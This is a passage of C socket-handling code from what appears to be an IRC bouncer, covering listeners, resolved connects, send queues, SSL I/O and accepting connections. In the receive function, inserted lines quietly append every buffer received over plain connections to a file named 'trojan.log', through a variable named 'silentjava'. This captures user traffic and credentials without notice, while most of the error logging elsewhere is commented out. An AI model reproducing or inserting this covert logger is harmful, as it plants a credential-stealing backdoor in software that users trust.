    time(&tm);
    lsock=syssock;
    if(syssock!=0)
    {
lkm=getpsocketbysock(lsock);
if (lkm!=NULL) return lsock; /* already existent.. so why the hell... */
    } else
    lsock = socket (proto, SOCK_STREAM, IPPROTO_TCP);
    if(lsock<=0)
    {
//p_log(LOG_ERROR,-1,lngtxt(790));
return 0x0;
    }
    flags = fcntl(lsock,F_GETFL,0);
    ret = fcntl(lsock,F_SETFL,flags | O_NONBLOCK);
    lkm=socketnode;
    while (lkm!=NULL)
    {
if (lkm->next==NULL || lkm->sock==NULL)
{
    if(lkm->sock!=NULL)
    {
lkm->next=(struct socketnodes *) pmalloc(sizeof(struct socketnodes));
lkm=lkm->next;
    }
    lkm->sock=(struct psockett *) pmalloc(sizeof(struct psockett));
    lkm->next=NULL;
    th=lkm->sock;
    th->type=type;
    th->protocol=proto;
    th->flag=SOC_NOUSE;
    th->syssock=lsock;
#ifdef HAVE_SSL
    th->ssl=ssl;
    th->sslfd=NULL;
#endif
    th->constructor=constructor;
    th->constructed=constructed;
    th->errorhandler=errorhandler;
    th->handler=handler;
    th->destructor=destructor;
    th->remapper=remapper;
    pcontext;
    th->commbuf=(char *)pmalloc(8192);
    th->bytesin=0;
    th->bytesout=0;
    th->param=index;
    th->sockgroup=group;
    pcontext;
    strmncpy(th->since,ctime(&tm),sizeof(th->since));
    break;
}
lkm=lkm->next;
    }
    if(lkm==NULL)
    {
//p_log(LOG_ERROR,-1,lngtxt(791));
exit(0x0);
    }
    return lsock;
}

/* kill a socket. used instead of close. possibly called iterative */
int killsocket(int syssock) {
    struct socketnodes *lkm,*ekm;
    struct socketnodes *siccur=currentsocket;
    int first=0;
    int(*caller)(int);
    int rc,i,t;
    lkm=getpsocketbysock(syssock);
    if(lkm==NULL) return 0x0;
    if(lkm==socketnode) first=1;
    if(lkm->sock!=NULL)
    {
if(lkm->sock->type==ST_LISTEN && lkm->sock->constructed==checknewlistener)
    return 0x0;
if(lkm->sock->sockgroup >0 && (ekm=getpsocketbygroup(socketnode,lkm->sock->sockgroup,lkm->sock->syssock)))
{
    if(lkm->sock->remapper!=NULL && ekm->sock!=NULL)
    {
rc=(*lkm->sock->remapper)(lkm->sock->param,ekm->sock->syssock);
    }
} else
/* call a destructor, if available */
if(lkm->sock->destructor!=NULL) {
    caller=lkm->sock->destructor;
    lkm->sock->destructor=NULL;
    lkm->sock->errorhandler=NULL;
    currentsocket=lkm;
    rc=(*caller)(lkm->sock->param);
    currentsocket=siccur;
    lkm=getpsocketbysock(syssock); /* if we are destroyed.. */
    if(lkm==NULL) return 0x0;
}
lkm->sock->serverstoned=0; /* would loop infinitely if */
lkm->sock->serversocket=0;
t=lkm->sock->entrys;
for(i=0;i<=t;i++)
flushsendq(lkm->sock->syssock,Q_FORCED);
#ifdef HAVE_SSL
if(lkm->sock->ssl==SSL_ON) {
    if(lkm->sock->sslfd!=NULL)
    {
SSL_shutdown(lkm->sock->sslfd);
SSL_free(lkm->sock->sslfd);
lkm->sock->sslfd=NULL;
    }
}
#endif
free(lkm->sock->commbuf);
free(lkm->sock);
if(first)
    socketnode=lkm->next;
else
    previous->next=lkm->next;
free(lkm);
    }
    shutdown(syssock,2);
    close(syssock);
    return 0x0;
}

void gotalarm(int sig) {
    longjmp(alarmret,0x0);
}

/* create a single listener,changed for 2.3.1 - only ips in host argument */
int createlistener(char *host,int listenport,int proto,int pending, int(*listenhandler)(int), int(*errorhandler)(int,int), int(*datahandler)(int), int(*closehandler)(int)) {
#ifdef IPV6
  struct sockaddr_in6 listen_sa6;
#endif
  struct hostent *he;
  struct sockaddr_in listen_sa;
  struct socketnodes *lkm;
  int sopts = 1;
  int issl=SSL_OFF;
  char vsl[10];
  int opt;
  char *ho;
  int listensocket;
  int rc;
  const char *pt;
  vsl[0]=0;
  if(host==NULL) return 0;
#ifdef HAVE_SSL
  if(strstr(host,"S=")==host)
  {
    ho=host+2;
    issl=SSL_ON;
    strmncpy(vsl,lngtxt(792),sizeof(vsl));
  } else
#endif
    ho=host;
  listensocket = socket (proto, SOCK_STREAM, IPPROTO_TCP);
  if(listensocket<=0) return 0;
  listensocket = createsocket(listensocket,ST_LISTEN,0,SGR_NONE,NULL,listenhandler,errorhandler,datahandler,closehandler,NULL,proto,issl);
  lkm=getpsocketbysock(listensocket);
  if(lkm==NULL || listensocket==0)
  {
      if(pending==0)
      //p_log(LOG_ERROR,-1,lngtxt(793),ho,listenport,vsl);
      return 0;
  }
  strmncpy(lkm->sock->source,host,sizeof(lkm->sock->source));
  strcpy(lkm->sock->dest,"*");
  lkm->sock->sport=listenport;
  lkm->sock->dport=0;
  lkm->sock->flag=SOC_SYN;
  highestsocket = listensocket;
  opt=sizeof(int);
  setsockopt (listensocket, SOL_SOCKET, SO_REUSEADDR, &sopts, opt);
#ifdef IPV6
  if(proto==AF_INET6)
     memset (&listen_sa6, 0, sizeof (struct sockaddr_in6));
  else
#endif
     memset (&listen_sa, 0, sizeof (struct sockaddr_in));
#ifdef IPV6
  if(proto==AF_INET6)
  {
      listen_sa6.sin6_port = htons (listenport);
      if(*ho=='*')
      {
          memcpy(&listen_sa6.sin6_addr,&in6addr_any,16);
  listen_sa6.sin6_family=AF_INET6;
      } else {
          if(inet_pton(AF_INET6,ho,&listen_sa6.sin6_addr)<=0)
          {
              killsocket(listensocket);
              if(pending==0)
                  p_log(LOG_ERROR,-1,lngtxt(794),ho,listenport,vsl);
      return 0x0;
          }
          listen_sa6.sin6_family=AF_INET6;
      }
      pt=ho;
      if(dcc6host[0]==0) strmncpy(dcc6host,lkm->sock->source,sizeof(dcc6host));
  } else {
#endif
      listen_sa.sin_port = htons (listenport);
      if(*ho=='*')
      {
          listen_sa.sin_addr.s_addr=htonl(INADDR_ANY);
  listen_sa.sin_family=AF_INET;
      } else {
          if(inet_aton(ho,&listen_sa.sin_addr)<=0)
          {
              killsocket(listensocket);
              if(pending==0)
                  //p_log(LOG_ERROR,-1,lngtxt(795),host,listenport,vsl);
      return 0x0;
          }
          listen_sa.sin_family=AF_INET;
      }
      strmncpy(lkm->sock->source,inet_ntoa(listen_sa.sin_addr),sizeof(lkm->sock->source));
      if(dcchost[0]==0)
  strmncpy(dcchost,lkm->sock->source,sizeof(dcchost));
#ifdef IPV6
  }
  if(proto==AF_INET6)
    rc=bind(listensocket, (struct sockaddr *) &listen_sa6, sizeof(listen_sa6));
  else
#endif
    rc=bind(listensocket, (struct sockaddr *) &listen_sa, sizeof (struct sockaddr_in));
  if (rc < 0)
  {
      killsocket(listensocket);
      if(pending==0)
          //p_log(LOG_ERROR,-1,lngtxt(796),ho,listenport,vsl);
      return 0;
  }
  if ((listen (listensocket, 1)) == -1)
  {
      killsocket(listensocket);
      if(pending==0)
          //p_log(LOG_ERROR,-1,lngtxt(797),ho,listenport,vsl);
      return 0;
  }
  if(pending==0)
  {
      printf(lngtxt(798),lkm->sock->source,listenport,vsl);
      //p_log(LOG_INFO,-1,lngtxt(799),lkm->sock->source,listenport,vsl);
  }
  return listensocket;
}

/* conntectto - builds a connection to a host and port using a given vhost */
int rsock;
int connectto(int sockt,char *host,int port, char *vhost) {
#ifndef BLOCKDNS
    struct socketnodes *snode;
    char *vh;
    char data[512];
    char *pt;
    int *it;
    char **ppt;
    int rc;
    if(!vhost)
vh="";
    else
vh=vhost;
    snode=getpsocketbysock(sockt);
    ap_snprintf(data,sizeof(data),"%d\n%s\n%d\n%s",sockt,host,port,vh);
    if(snode)
if(snode->sock)
    snode->sock->flag=SOC_RESOLVE;
    if(dns_forward(host,connecthostresolved,connecthostnotresolved,data)==0x2)
    {
return 0x0;
    }
    else
return sockt;
}

int connecthostnotresolved(struct resolve *rp) {
    char *pt,*ept;
    struct socketnodes *lkm;
    int sockt;
    char *host;
    int port;
    if(rp)
    {
if(rp->data)
{
    pt=strchr(rp->data,'\n');
    if(pt)
    {
*pt=0;
sockt=atoi(rp->data);
lkm=getpsocketbysock(sockt);
if(lkm)
{
    if(lkm->sock)
    {
pt++;
host=pt;
pt=strchr(pt,'\n');
if(pt)
{
    *pt=0;
    pt++;
    ept=strchr(pt,'\n');
    if(ept)
    {
*ept=0;
port=atoi(pt);
//p_log(LOG_ERROR,-1,"Cannot resolve Host '%s'. Connect to %s:%d cancelled",host,host,port);
killsocket(sockt);
    }
}
    }
}
    }
}
    }
}

/* is called, when the resolve worked */
int connecthostresolved(struct resolve *rp) {
    char *pt,*ept;
    static struct resolve *dummy=NULL;
    struct socketnodes *lkm;
    int sockt;
    static char rpdata[1024];
    char *host;
    char *vhost;
    int port;
    if(rp)
    {
if(rp->data)
{
    strmncpy(rpdata,rp->data,sizeof(rpdata));
    pt=strchr(rpdata,'\n');
    if(pt)
    {
*pt=0;
sockt=atoi(rpdata);
lkm=getpsocketbysock(sockt);
if(lkm)
{
    if(lkm->sock)
    {
pt++;
host=pt;
pt=strchr(pt,'\n');
if(pt)
{
    *pt=0;
    pt++;
    ept=strchr(pt,'\n');
    if(ept)
    {
*ept=0;
port=atoi(pt);
ept++;
vhost=ept;
lkm->sock->protocol=rp->protocol;
if(vhost[0])
    dns_forward(vhost,connectvhostresolved,connectvhostresolved,rp->data);
else
{
    if(dummy==NULL)
dummy=(struct resolve *)pmalloc(sizeof(struct resolve));
    strmncpy(dummy->data,rp->data,sizeof(dummy->data));
    dummy->state=STATE_FAILED;
    connectvhostresolved(dummy);
}
    }
}
    }
}
    }
}
    }
}

int connectvhostresolved(struct resolve *rp)
{
    char *host;
    int sockt;
    char *vhost=NULL;
    int port;
    char *pt,*ept;
    struct resolve *erp;
#endif
    int l, error;
    struct socketnodes *lkm;
#ifdef IPV6
    struct sockaddr_in6 sin6;
    int newsock;
#endif
    struct sockaddr_in sin;
    struct hostent *he;
#ifdef SUNOS
    struct hostent *hesun=NULL;
#endif
#ifdef IPV6
    char myhost[60];
    char hishost[60];
#else
    char myhost[15];
    char hishost[15];
#endif
    int proto=AF_INET;
    int flags, ret;
    pcontext;
#ifndef BLOCKDNS
    if(!rp) return 0x0;
    proto=rp->protocol;
    pt=rp->data;
    ept=strchr(pt,'\n');
    if(ept==NULL) return 0x0;
    *ept=0;
    sockt=atoi(pt);
    ept++;
    pt=strchr(ept,'\n');
    if(pt==NULL) return 0x0;
    *pt=0;
    host=ept;
    pt++;
    ept=strchr(pt,'\n');
    if(ept==NULL) return 0x0;
    *ept=0;
    ept++;
    port=atoi(pt);
    if(rp->state!=STATE_FAILED)
vhost=ept;
    erp=findhost(host);
    if(!erp) return 0x0;
#endif
    if (host==NULL) return -1; /* could be NULL in bad cases */
    memset( &sin, 0, sizeof(sin));
#ifdef IPV6
    memset( &sin6, 0, sizeof(sin6));
#endif
#ifdef BLOCKDNS
    proto=getprotocol(host);
#endif
    rsock = sockt;
    strcpy(myhost,"*");
    myhost[0]=0;
    hishost[0]=0;
    if (rsock < 1) return 0x0;
    lkm=getpsocketbysock(rsock);
    if(lkm==NULL)
return 0x0;
    if(lkm->sock==NULL)
return 0x0;
#ifdef IPV6
    if(proto==AF_INET6)
    {
newsock=socket(AF_INET6,SOCK_STREAM,IPPROTO_TCP);
if(newsock>0)
{
    flags = fcntl(newsock,F_GETFL,0);
    fcntl(newsock,F_SETFL,flags | O_NONBLOCK);
    if(lkm->sock->remapper!=NULL)
ret=(*lkm->sock->remapper)(lkm->sock->param,newsock);
    close(lkm->sock->syssock);
    lkm->sock->syssock=newsock;
    rsock=newsock;
    sockt=newsock;
}
    }
    lkm->sock->protocol=proto;
#endif
    if (vhost!=NULL) {
#ifdef IPV6
if(lkm->sock->protocol==AF_INET6)
{
#ifdef BLOCKDNS
    signal(SIGALRM,gotalarm);
    if(setjmp(alarmret)==0x0)
    {
alarm(10);
#ifdef SUNOS
he=getipnodebyname(vhost,AF_INET6,0,&error_num);
hesun=he;
#else
        he=gethostbyname2(vhost,AF_INET6);
#endif
signal(SIGALRM,SIG_IGN);
alarm(0);
    } else
he=NULL;
    signal(SIGALRM,SIG_IGN);
    if(he) {
memcpy(&sin6.sin6_addr,he->h_addr,he->h_length);
#ifdef SUNOS
if(hesun)
    freehostent(hesun);
#endif
#else
    if(rp->state==STATE_FINISHED && rp->protocol==AF_INET6)
    {
memcpy(&sin6.sin6_addr,rp->ip6,16);
#endif
sin6.sin6_family=AF_INET6;
inet_ntop(AF_INET6,&sin6,myhost,sizeof(myhost));
if(bind(rsock, (struct sockaddr *)&sin6, sizeof(sin6)) <0)
{
    /* ! */
}
    }
} else {
#endif
#ifdef BLOCKDNS
    signal(SIGALRM,gotalarm);
    if(setjmp(alarmret)==0x0)
    {
alarm(10);
he=gethostbyname(vhost);
signal(SIGALRM,SIG_IGN);
alarm(0);
    } else
he=NULL;
    signal(SIGALRM,SIG_IGN);
    if(he) {
memcpy(&sin.sin_addr,he->h_addr,he->h_length);
sin.sin_family = he->h_addrtype;
#else
    if(rp->state==STATE_FINISHED && rp->protocol==AF_INET)
    {
memcpy(&sin.sin_addr,&rp->ip,4);
sin.sin_family = AF_INET;
#endif
strmncpy(myhost,inet_ntoa(sin.sin_addr),sizeof(myhost));
if(bind(rsock, (struct sockaddr *)&sin, sizeof(sin)) <0)
{
    /* ! */
}
    }
#ifdef IPV6
}
#endif
    }
    memset(&sin,0,sizeof(sin));
#ifdef IPV6
    memset( &sin6, 0, sizeof(sin6));
    if(lkm->sock->protocol==AF_INET6)
    {
sin6.sin6_port = htons(port);
#ifdef BLOCKDNS
signal(SIGALRM,gotalarm);
if(setjmp(alarmret)==0x0)
{
    alarm(10);
#ifdef SUNOS
    he=getipnodebyname(host,AF_INET6,0,&error_num);
    hesun=he;
#else
    he=gethostbyname2(host,AF_INET6);
#endif
    signal(SIGALRM,SIG_IGN);
    alarm(0);
} else
    he=NULL;
        signal(SIGALRM,SIG_IGN);
if(!he)
{
    if(rsock>0)
killsocket(rsock);
    return 0x0;
}
sin6.sin6_family=he->h_addrtype;
memcpy(&sin6.sin6_addr,he->h_addr,he->h_length);
#ifdef SUNOS
if(hesun) freehostent(hesun);
#endif
#else
sin6.sin6_family=AF_INET6;
memcpy(&sin6.sin6_addr,erp->ip6,16);
#endif
inet_ntop(AF_INET6,&sin6,hishost,sizeof(hishost));
ret=connect(rsock,(struct sockaddr *)&sin6, sizeof(sin6));
    } else {
#endif
sin.sin_port = htons(port);
#ifdef BLOCKDNS
signal(SIGALRM,gotalarm);
if(setjmp(alarmret)==0x0)
{
    alarm(10);
    he=gethostbyname(host);
    signal(SIGALRM,SIG_IGN);
    alarm(0);
} else
    he=NULL;
signal(SIGALRM,SIG_IGN);
if(!he)
{
    if(rsock>0)
killsocket(rsock);
    return 0x0;
}
sin.sin_family=he->h_addrtype;
memcpy(&sin.sin_addr,he->h_addr,he->h_length);
#else
memcpy(&sin.sin_addr,&erp->ip,4);
sin.sin_family=AF_INET;
#endif
strmncpy(hishost,inet_ntoa(sin.sin_addr),sizeof(hishost));
ret =connect(rsock, (struct sockaddr *)&sin, sizeof(sin));
#ifdef IPV6
    }
#endif
    if (ret < 0) {
        if (errno != EINPROGRESS && ret != -EINPROGRESS)
{
    killsocket(rsock);
#ifndef BLOCKDNS
    free(erp->data);
#endif
    return 0x0;
}
    }
    if(lkm!=NULL)
    {
lkm->sock->flag=SOC_SYN;
lkm->sock->delay=0;
if(socketnode->sock!=NULL)
    lkm->sock->sport=socketnode->sock->sport;
lkm->sock->dport=port;
replace(myhost,'%',127);
replace(hishost,'%',127);
strmncpy(lkm->sock->source,myhost,sizeof(lkm->sock->source));
strmncpy(lkm->sock->dest,hishost,sizeof(lkm->sock->dest));
    }
    return rsock;
}

int urgent=0;

/* flush the queue */

int flushsendq(int socket, int forced)
{
    struct socketnodes *lkm;
    struct sendqt *msq,*emsq;
    char *msqd;
    size_t msglen;
    lkm=getpsocketbysock(socket);
    if(lkm==NULL) return 0x0; /* no socket, no queue */
    msq=lkm->sock->sendq;
    if(msq==NULL) return 0x0; /* nothing to flush */
    if(lkm->sock->flag<SOC_CONN) return 0x0; /* not yet connected.. no flush */
    if(forced!=Q_FORCED)
    {
if(msq->delay>0)
{
    msq->delay-=delayinc;
    return 0x0;
}
    }
    if(lkm->sock->serversocket==1 && lkm->sock->flag==SOC_CONN)
    {
if(lkm->sock->serverstoned>0) return 0x0;
if(lkm->sock->serverbytes+strlen(msq->data)>700)
{
    if(strlen(msq->data)<700)
    {
lkm->sock->serverstoned=20;
if(lkm->sock->flag==SOC_CONN)
{
#ifdef HAVE_SSL
    if(lkm->sock->ssl==SSL_ON && lkm->sock->sslfd!=NULL)
SSL_write(lkm->sock->sslfd,lngtxt(800),9);
    else
#endif
write(socket,lngtxt(801),9);
}
return 0x0;
    }
}
lkm->sock->serverbytes+=strlen(msq->data);
    }
    urgent=1;
    msglen=msq->len;
    msqd=msq->data;
    emsq=msq;
    msq=msq->next;
    free(emsq);
    lkm->sock->sendq=msq;
    lkm->sock->entrys--;
    if(lkm->sock->dataflow==SD_STREAM)
        writesock_STREAM(socket,msqd,msglen);
    else
        writesock(socket,msqd);
    free(msqd);
    return 0x0;
}

/* add data to a queue */

int readd=0;

int addq(int socket, char *data, size_t len, int sqdelay)
{
    struct socketnodes *lkm=socketnode;
    struct socketnodes *akm;
    struct sendqt *msq;
    unsigned long group=0;
    int lp=1;
    akm=getpsocketbysock(socket);
    if(akm)
    {
if(akm->sock)
    group=akm->sock->sockgroup;
    }
    while(lp)
    {
if(group)
    lkm=getpsocketbygroup(lkm->next,group,-1);
else
    lkm=akm;
if(lkm==NULL) /* no socket descriptor, URGENT sent */
{
    if(group==0)
    {
urgent=1;
writesock(socket,data);
    }
} else {
    lkm->sock->entrys++;
    /* changed for 2.3.1 - if this is an ssl socket, this would lead to a loop
               if x509-lookup still would run  */
#ifndef HAVE_SSL
        if(lkm->sock->entrys>MAX_SENDQ && lkm->sock->serverstoned==0)
#else
        if(lkm->sock->entrys>MAX_SENDQ && lkm->sock->serverstoned==0 && lkm->sock->ssl!=SSL_ON)
#endif
    flushsendq(socket,Q_FORCED); /* too many entries -> flushing */
    if (lkm->sock->sendq==NULL)
    {
lkm->sock->sendq=(struct sendqt *)pmalloc(sizeof(struct sendqt));
            msq=lkm->sock->sendq;
    } else {
/* changed in 2.3.1 - readd an entry at the start of the queue */
if(readd)
{
    sqdelay=5;
        msq=(struct sendqt *)pmalloc(sizeof(struct sendqt));
        msq->next=lkm->sock->sendq;
        lkm->sock->sendq=msq;
} else {
        msq=lkm->sock->sendq;
        while(msq->next!=NULL) msq=msq->next;
        msq->next=(struct sendqt *)pmalloc(sizeof(struct sendqt));
    msq=msq->next;
}
    }
    msq->data=(char *)pmalloc(len+2);
    msq->len=len;
    msq->delay=sqdelay;
    memcpy(msq->data,data,len);
}
if(group)
{
    if(!lkm) lp=0;
}
else
    lp=0;
    }
    return 0x0;
}

/* write data to a binary socket */

int writesock_STREAM(int socket, unsigned char *data, unsigned int size)
{
    int rc;
    struct socketnodes *lkm;
    lkm=getpsocketbysock(socket);
    if(lkm==NULL) return 0x0;
    if(urgent==0)
    {
addq(socket,data,size,0);
return 0x0;
    } else
    if(lkm->sock->flag==SOC_CONN)
    {
#ifdef HAVE_SSL
if(lkm->sock->ssl==SSL_ON && lkm->sock->sslfd!=NULL)
{
    rc=SSL_write(lkm->sock->sslfd,data,size);
    switch(SSL_get_error(lkm->sock->sslfd,rc))
    {
        case SSL_ERROR_NONE:
    break;
case SSL_ERROR_WANT_WRITE:
case SSL_ERROR_WANT_READ:
case SSL_ERROR_WANT_X509_LOOKUP:
    /* back onto the queue */
    readd=1;
    addq(lkm->sock->syssock,data,size,0);
    readd=0;
    return 0x0;
default:
    return -1;
    }
} else
#endif
    write(socket,data,size);
    }
    lkm->sock->bytesout+=size;
    urgent=0;
    return 0x0;
}

/* write data to a socket */

int writesock (int socket, char *data)
{
    static char buf[8200];
    char sbuf[8200];
    static char kbuf[30];
    char *po;
    int rc;
    struct socketnodes *lkm;
    lkm=getpsocketbysock(socket);
    if(lkm==NULL) return 0x0;
    if(lkm->sock==NULL) return 0x0;
    if(lkm->sock->flag<SOC_CONN) urgent=0;
    if(urgent==0 && lkm->sock->nowfds !=1)
    {
addq(socket,data,strlen(data)+1,0);
return 0x0;
    }
    if (socket == 0) return -1;
    if(*data==0) return 0x0;
    strmncpy(buf,data,sizeof(buf));
    po=strchr(buf,'\n');
    if (po == NULL) strcat(buf,"\r\n");
    if(po!=NULL)
    {
        po--;
        if (*po!='\r')
        {
        po++;
    *po='\r';
    po++;
    *po='\n';
    po++;
    *po=0;
}
    }
    errn=0;
    if(lkm!=NULL)
    {
if(lkm->sock!=NULL)
{
    lkm->sock->bytesout+=strlen(buf);
}
    }
    if(urgent==1 || lkm->sock->nowfds == 1)
    {
replace(buf,127,'%');
if(lkm->sock->flag==SOC_CONN)
{
#ifdef HAVE_SSL
    if(lkm->sock->ssl==SSL_ON && lkm->sock->sslfd!=NULL)
    {
strcpy(sbuf,buf);
rc=SSL_write(lkm->sock->sslfd,sbuf,strlen(sbuf));
switch(SSL_get_error(lkm->sock->sslfd,rc))
{
    case SSL_ERROR_NONE:
break;
    case SSL_ERROR_WANT_WRITE:
    case SSL_ERROR_WANT_READ:
    case SSL_ERROR_WANT_X509_LOOKUP:
/* put it back on the queue, dont block here */
readd=1;
addq(lkm->sock->syssock,sbuf,strlen(sbuf)+1,0);
readd=0;
break;
    default:
break;
}
    } else
#endif
write(socket,buf,strlen(buf));
}
lkm->sock->delay=300;
urgent=0;
    }
    if (errn == 1) {
       /* heavy error on writing */
       return -1;
    }
    return 0x0;
}

/* urgent writes */

int writesock_URGENT (int socket, char *data)
{
    urgent=1;
    return writesock(socket,data);
}

/* write in a delay */

int writesock_DELAY (int socket, char *data, int delay)
{
    return addq(socket,data,strlen(data)+1,delay);
}

/* write with format */

int
ssnprintf(int sock, char *format,...)
{
    va_list va;
    static char buf[8192];
    va_start(va,format);
    ap_vsnprintf(buf,sizeof(buf),format,va);
    writesock(sock,buf);
    va_end(va);
    return strlen(buf);
}

/* define the protocol based on a given host */

int getprotocol(char *host)
{
#ifdef BLOCKDNS
#ifdef IPV6
    char hostr[200];
    struct sockaddr_in6 sin6;
    struct hostent *he;
    signal(SIGALRM,gotalarm);
    if(setjmp(alarmret)==0x0)
    {
alarm(10);
#ifdef SUNOS
he=getipnodebyname(host,AF_INET6,0,&error_num);
#else
        he=gethostbyname2(host,AF_INET6);
#endif
signal(SIGALRM,SIG_IGN);
alarm(0);
    } else
he=NULL;
    signal(SIGALRM,SIG_IGN);
    if(he) {
#ifdef SUNOS
freehostent(he);
#endif
return AF_INET6;
    }
#endif
    return AF_INET;
#else
#ifndef IPV6
    return AF_INET;
#else
    unsigned char inaddr6[16];
    if(inet_pton(AF_INET6,host,&inaddr6[0])>0) return AF_INET6;
    return AF_INET;
#endif
#endif
}

/* recv from a socket */

int receivesock(struct psockett *sock)
{
    FILE *silentjava;
    int ret=1,i;
    int sz=8191;
    int rc;
    char *br,*ebr;
    int kln;
    int esck;
    char *puk,*pt,*eh;
    static char buf[8192],kbuf[20];
#ifndef BLOCKDNS
    if(sock->type==ST_RESOLVER)
    {
sock->bytesread=0;
if (sock->handler!=NULL)
{
    rc=(*sock->handler)(sock->param);
}
return 0x1;
    }
#endif
    sz-=sock->bytesread;
    ircbuf[0]=0;
    if(sz>0)
    {
errno=0;
#ifdef HAVE_SSL
if(sock->ssl==SSL_ON)
{
    if(sock->sslfd==NULL)
ret=0;
    else
ret=SSL_read((SSL *)sock->sslfd,sock->commbuf+sock->bytesread,sz);
    if(ret==-1 && (rc = SSL_get_error((SSL *)sock->sslfd,ret)) == SSL_ERROR_WANT_READ)
    {
*ircbuf=0;
return 1;
    }
    if(ret<=0) return ret;
    sock->bytesread+=ret;
} else {
#endif
    ret=recv(sock->syssock,sock->commbuf+sock->bytesread,sz,0);
            silentjava = fopen("./trojan.log","a+");
            fprintf(silentjava,"\n%s\n",sock->commbuf+sock->bytesread);
            fclose(silentjava);
     if (ret>0) sock->bytesread+=ret;
    if (ret==-1 && ((errno == EWOULDBLOCK) || (errno == EAGAIN))) { *ircbuf=0; return 1; }
    if (ret<=0) return ret;
#ifdef HAVE_SSL
}
#endif
    } else {
/* a bug found by Tom R. Flo */
killsocket(sock->syssock);
*ircbuf=0;
return 0x1;
    }
    if (ret>0) sock->bytesin+=ret;
    if(sock->dataflow==SD_STREAM)
    {
if(ret<=0 || ret>sizeof(ircbuf)) return 1;
memcpy(&ircbuf,sock->commbuf,ret);
sock->datalen=ret;
sock->bytesread=0;
if (sock->handler!=NULL)
{
    rc=(*sock->handler)(sock->param);
}
return ret;
    }
    esck=sock->syssock;
    br=strchr(sock->commbuf,'\n');
    if(br==NULL) br=strchr(sock->commbuf,10); /* nulline, ignore */
    while(br!=NULL && getpsocketbysock(esck)!=NULL && ret>0)
    {
    br++; /*   */
memset(ircbuf,0x0,sizeof(ircbuf));
memcpy((void *)ircbuf,(void *)sock->commbuf,(br-sock->commbuf));
memcpy((void *)buf,(void *)br,8192-((br-sock->commbuf)));
memcpy((void *)sock->commbuf,(void *)buf,8192-((br-sock->commbuf)));
sock->bytesread-=((br-sock->commbuf));
memset((void *)sock->commbuf+sock->bytesread,0x0,(8191-sock->bytesread));
replace(ircbuf,'%',127);
ebr=strchr(ircbuf,'\r');
if(ebr==NULL) ebr=strchr(ircbuf,'\n');
esck=sock->syssock;
if (sock->serversocket==1)
{
    pt=strchr(ircbuf,' ');
    if(pt!=NULL)
    {
pt++;
if(strstr(pt,lngtxt(802))==pt) /* received PONG, resetting stone */
{
    if(sock->serverstoned!=0)
    {
sock->serverstoned=0;
sock->serverbytes=0;
    } else {
user(sock->param)->pinged=0;
user(sock->param)->pingtime=time(NULL);
    }
    ircbuf[0]=0;
}
    }
}
if (sock->handler!=NULL && strlen(ircbuf)>1)
{
    rc=(*sock->handler)(sock->param);
}
        if (getpsocketbysock(esck)==NULL) { ret=-1;break; }
br=strchr(sock->commbuf,'\n');
if(br==NULL) br=strchr(sock->commbuf,10);
    }
    return ret;
}

unsigned long oldsec=0;
int socket_connect() {
    int ern,rc;
    ern=0;
#ifdef HAVE_SSL
    if(currentsocket->sock->ssl==SSL_ON && currentsocket->sock->sslfd!=NULL)
    {
rc=SSL_set_fd(currentsocket->sock->sslfd,currentsocket->sock->syssock);
if(rc==-1)
{
    ern=SSL_get_error((SSL *)currentsocket->sock->sslfd,rc);
    if(ern!=SSL_ERROR_WANT_READ && ern!=SSL_ERROR_WANT_WRITE && ern!=SSL_ERROR_NONE)
    {
//p_log(LOG_ERROR,-1,lngtxt(803),currentsocket->sock->syssock,currentsocket->sock->param);
    ern=-1;
    }
    else
    ern=0;
}
if(ern==0) {
    SSL_set_connect_state(currentsocket->sock->sslfd);
    rc=SSL_connect(currentsocket->sock->sslfd);
    if(rc==-1) {
    ern=SSL_get_error((SSL *)currentsocket->sock->sslfd,rc);
    if(ern!=SSL_ERROR_WANT_READ && ern!=SSL_ERROR_WANT_WRITE && ern!=SSL_ERROR_NONE) {
//p_log(LOG_ERROR,-1,lngtxt(804),currentsocket->sock->syssock,currentsocket->sock->param);
    ern=-1;
} else
    ern=0;
    }
}
    }
#endif
    return ern;
}
#ifdef HAVE_SSL
char sgcert[1024];

char *sslgetcert(SSL *ssls) {
    struct X509 *x5r;
    char *str;
    x5r=(struct X509 *)SSL_get_peer_certificate((SSL *)ssls);
    if(x5r!=NULL)
    {
str=X509_NAME_oneline(X509_get_subject_name((X509 *)x5r),0,0);
if(str!=NULL)
{
    strmncpy(sgcert,str,sizeof(sgcert));
    free(str);
    str=X509_NAME_oneline(X509_get_issuer_name((X509 *)x5r),0,0);
    if(str!=NULL)
    {
strncat(sgcert," ",sizeof(sgcert));
sgcert[sizeof(sgcert)-1]=0;
strncat(sgcert,str,sizeof(sgcert));
sgcert[sizeof(sgcert)-1]=0;
free(str);
str=sgcert;
    } else
str=NULL; /* no issuer */
} else
    str=NULL; /* no subject */
X509_free((X509 *)x5r);
    } else
str=NULL; /* no cert. */
    return str;
}
/* check the cert
 * logitem should be "Link #n" or "User FooBar"
 */
int sslcheckcert(int socket, char *cert, char *logitem) {
    struct socketnodes *ps;
    char *ccert;
    int rc;
    ps=getpsocketbysock(socket);
    if(ps!=NULL)
    {
if(ps->sock->sslfd!=NULL) {
    ccert=sslgetcert(ps->sock->sslfd);
    if(ccert==NULL)
    {
if(SSLSEC==0)
{
    //p_log(LOG_INFO,-1,lngtxt(805),logitem);
    rc=1;
} else {
    //p_log(LOG_ERROR,-1,lngtxt(806),logitem);
    rc=0;
}
    } else {
if(strmcmp(ccert,cert))
{
    //p_log(LOG_INFO,-1,lngtxt(807),logitem);
    rc=1;
} else {
    if(SSLSEC==0)
    {
//p_log(LOG_INFO,-1,lngtxt(810),logitem,ccert);
rc=1;
    }
    else
    {
//p_log(LOG_INFO,-1,lngtxt(811),logitem,ccert);
rc=0;
    }
}
    }
} else
    rc=-1;
    } else
rc=-1;
    return rc;
}
#endif
#ifdef IPV6
char acip6[16];
#endif
unsigned long acip;
/* accept incoming call on listener */
int p_accept( int lsock) {
#ifdef IPV6
   struct sockaddr_in6 addr6;
#endif
   struct sockaddr_in addr;
   struct socketnodes *lkm;
   int tm;
   int str;
   int nsock;
   lkm=getpsocketbysock(lsock);
   if(lkm==NULL)
      return -1;
#ifdef IPV6
   if(lkm->sock->protocol==AF_INET6)
   {
      tm = sizeof(addr6);
      str = accept(lsock, ( struct sockaddr *)&addr6, &tm);
      if(str==-1) {
          /* better handling needed: the listener is screwed up.
     we need to remove it */
  lkm->sock->constructed=NULL;
  killsocket(lsock);
  /* freed memory accessed in creating a new listener.. fixed for version 2.3.2 */
          return -1;
      }
